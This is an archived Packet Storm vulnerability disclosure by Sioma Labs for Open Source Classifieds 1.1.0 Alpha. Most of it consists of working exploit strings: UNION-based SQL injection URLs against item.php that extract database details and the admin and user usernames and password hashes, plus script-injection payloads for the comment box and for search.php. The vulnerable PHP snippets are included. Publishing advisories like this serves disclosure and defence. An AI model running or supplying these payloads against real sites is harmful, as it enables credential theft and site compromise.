exploit the possibilities

Open Source Classifieds 1.1.0 Alpha Cross Site Scripting / SQL Injection

Open Source Classifieds 1.1.0 Alpha Cross Site Scripting / SQL Injection
Posted Feb 19, 2010
Authored by Sioma Labs

Open Source Classifieds version 1.1.0 Alpha suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 6ce5bef409461fcc5c50fc32b3a1b57e

Open Source Classifieds 1.1.0 Alpha Cross Site Scripting / SQL Injection

Change Mirror Download

__ _ __ _
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___
\ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
========================================================================================
Open Source Classifieds (OSClassi) SQLi/Xss Multi Vulnerabilities
----------------------------------------------------------------------------------------
- Site : http://osclass.org/
- Download : http://sourceforge.net/projects/osclass/files/
- Author : Sioma Labs
- Version : 1.1.0 Alpha
- Tested on : WIndows XP SP2 (WAMP)

[-------------------------------------------------------------------------------------------------------------------------]

MYSQL Injection
===============
POC
http://localhost/item.php?id=[SQLi]

Basic Info
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--

Admin ID,Username,Password
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--

User ID,UserName,Password
http://localhost/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--

[-------------------------------------------------------------------------------------------------------------------------]
Cross Site Scripting
====================

Xss Source Review (item.php)
------------------------------

1st Xss item.php
[+] To Work This You need to Have A iteam already posted (http://localhost/item.php?action=post)
------------------------------
case 'add_comment':
dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",
DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
header('Location: item.php?id=' . $_POST['id']);
break;
case 'post':
------------------------------

[+] Put This c0de in to the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>

-------------------------------

2nd Xss (search.php)
---------------------------------
$pattern = $_GET['pattern'];
--------------------------------

POC
http://localhost/search.php?pattern=[Xss]
Exploit
http://localhost/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>

[-------------------------------------------------------------------------------------------------------------------------]

# http://siomalabs.com [Sioma Labs]
# Sioma Agent 154

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    19 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close